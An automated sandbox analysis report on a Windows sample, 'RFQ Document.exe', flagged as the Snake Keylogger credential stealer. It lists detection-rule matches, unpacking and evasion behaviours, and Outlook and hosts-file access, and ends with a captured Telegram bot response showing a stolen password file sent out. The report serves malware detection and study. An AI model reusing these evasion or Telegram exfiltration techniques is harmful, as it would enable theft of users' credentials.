                  Source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00406354
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00404802
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00406B2B
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD87500
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD8BA79
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD8BA6A
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_6FD8754F
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0040A2A5
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_023451B0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234E182
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234C1D7
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234D660
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_023486B0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_02342772
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_02343578
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234E5E2
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234EA40
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_02344B88
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234EEA1
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234DD06
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234CD60
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234D650
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234B6F8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234B6E8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_023426CE
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0234DCB0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594A998
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594DDB8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594ADF0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594D508
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05941130
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594A540
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594D960
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05949C90
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594D0B0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594A0E8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594C800
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05949838
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594CC58
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05948F88
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594C3A8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059493E0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05948B30
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594BF50
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594B6A0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059486D8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594BAF8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594E210
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05945650
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594B248
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594A98A
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594DDA9
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594ADE0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594A530
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05941124
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594D951
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05944C9A
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05949C80
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594D0A0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05944CA8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594A0D8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594D4FA
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05949828
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594CC48
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594C398
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059493D2
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594C7F0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05948B21
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594BF42
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05948F78
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594B691
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059486C7
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594BAE8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594B238
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05974588
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597C529
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05973CB0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059784E0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05973400
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597A468
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05970C68
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05975F98
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05972FA8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059797C8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05977E98
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059726D0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059756E8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05979E18
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05974E38
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059771F8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059749E0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05974108
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05979178
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05971968
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05973858
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05970040
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05977848
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059763F0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05978B28
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05972B50
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05975B40
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05975290
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597AAB0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597457A
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05973CA0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059784D0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597A45A
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05972F9A
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05975F88
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059797B8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05977E88
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059756DA
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059726C2
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05979E08
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05974E28
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597E990
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597E9A0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059749CF
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059771E7
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05979168
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059708F0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059740F8
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059708E0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05970006
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597783A
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0597384A
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059733F0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_059763E0
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05978B18
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_05975B30
                  Source: RFQ Document.exe, 00000001.00000003.662485208.000000000E936000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RFQ Document.exe
                  Source: RFQ Document.exe, 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs RFQ Document.exe
                  Source: RFQ Document.exeBinary or memory string: OriginalFilename vs RFQ Document.exe
                  Source: RFQ Document.exe, 00000002.00000002.925878949.0000000000197000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs RFQ Document.exe
                  Source: RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs RFQ Document.exe
                  Source: RFQ Document.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile read: C:\Users\user\Desktop\RFQ Document.exeJump to behavior
                  Source: RFQ Document.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\RFQ Document.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\RFQ Document.exe 'C:\Users\user\Desktop\RFQ Document.exe'
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess created: C:\Users\user\Desktop\RFQ Document.exe 'C:\Users\user\Desktop\RFQ Document.exe'
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess created: C:\Users\user\Desktop\RFQ Document.exe 'C:\Users\user\Desktop\RFQ Document.exe'
                  Source: C:\Users\user\Desktop\RFQ Document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile created: C:\Users\user\AppData\Local\Temp\nsk2EC6.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@5/3
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00402053 CoCreateInstance,MultiByteToWideChar,
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                  Source: C:\Users\user\Desktop\RFQ Document.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,
                  Source: RFQ Document.exeString found in binary or memory: F-Stopw
                  Source: 2.2.RFQ Document.exe.4940000.5.unpack, ???mufffd/ufffd???R.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                  Source: 2.2.RFQ Document.exe.4940000.5.unpack, ufffdufffd??ufffd/ufffdu0609ufffd?m.csCryptographic APIs: 'TransformFinalBlock'
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\RFQ Document.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Binary string: wntdll.pdbUGP source: RFQ Document.exe, 00000001.00000003.668676239.000000000E820000.00000004.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: RFQ Document.exe, 00000001.00000003.668676239.000000000E820000.00000004.00000001.sdmp

                  Data Obfuscation:

                  barindex
                  Detected unpacking (overwrites its own PE header)Show sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeUnpacked PE file: 2.2.RFQ Document.exe.400000.1.unpack
                  Detected unpacking (changes PE section rights)Show sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeUnpacked PE file: 2.2.RFQ Document.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;
                  Detected unpacking (creates a PE file in dynamic memory)Show sources
                  Source: C:\Users\user\Desktop\RFQ Document.exeUnpacked PE file: 2.2.RFQ Document.exe.4940000.5.unpack
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_00401F16 push ecx; ret
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594FD90 pushfd ; ret
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_0594FE19 pushfd ; ret
                  Source: C:\Users\user\Desktop\RFQ Document.exeFile created: C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dllJump to dropped file
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ Document.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00405EC2 FindFirstFileA,FindClose,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 1_2_00402671 FindFirstFileA,
                  Source: C:\Users\user\Desktop\RFQ Document.exeCode function: 2_2_00404A29 FindFirstFileExW,
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpBinary or memory string: {"ok":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"document":{"file_name":"SnakePW.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIyHGFSr0k04FSKMz2uOWGp3zHXGj4OAALpDAACxkKRUr9jsMmoR-bZIQQ","file_unique_id":"AgAD6QwAAsZCkVI","file_size":195},"caption":"Pc Name: user | Snake Keylogger\n\nPW | user | Snake"}}
                  Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmpBinary or memory string: {"ok":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"document":{"file_name":"SnakePW.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIyHGFSr0k04FSKMz2uOWGp3zHXGj4OAALpDAACxkKRUr9jsMmoR-bZIQQ","file_unique_id":"AgAD6QwAAsZCkVI","file_size":195},"caption":"Pc Name: user | Snake Keylogger\n\nPW | user | Snake"}}d
